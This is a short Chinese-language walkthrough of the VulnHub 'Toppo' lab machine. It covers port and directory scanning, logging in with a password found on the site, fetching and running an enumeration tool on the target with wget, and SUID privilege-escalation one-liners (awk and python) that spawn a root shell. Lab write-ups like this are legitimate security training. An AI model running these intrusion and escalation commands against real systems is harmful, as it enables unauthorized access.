这个靶机主要是suid提权,相对简单,靶机下载:
官网链接:https://download.vulnhub.com/toppo/Toppo.zip

使用nmap和dirb进行web打点
nmap -sS 10.10.10.222 -p- -A -T4
dirsearch -u http://10.10.10.222/

web识别,是一个普通的html页面
whatweb http://10.10.10.222/

发现了一个密码信息 12345ted123

我们猜测账号就是那串密码夹着中间的英文ted

登录成功之后就是内网渗透,我们使用FeatherScan进行内网信息收集
git clone https://github.com/baibaixiaoyu2024/FeatherScan.git
cd FeatherScan_v4_5_
python -m http.server
# 靶机
wget 10.10.10.130:8000/FeatherScan_v4_5
wget 10.10.10.130:8000/feather_vuln_db.txt
chmod +x FeatherScan_v4_5
./FeatherScan_v4_5

发现提权漏洞

得到两个提权向量,两个命令都可以用
awk 'BEGIN {system("/bin/sh")}'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换

至此提权成功!很简单吧
本站小部分内容转载于互联网,如有侵权还请联系THE END
















暂无评论内容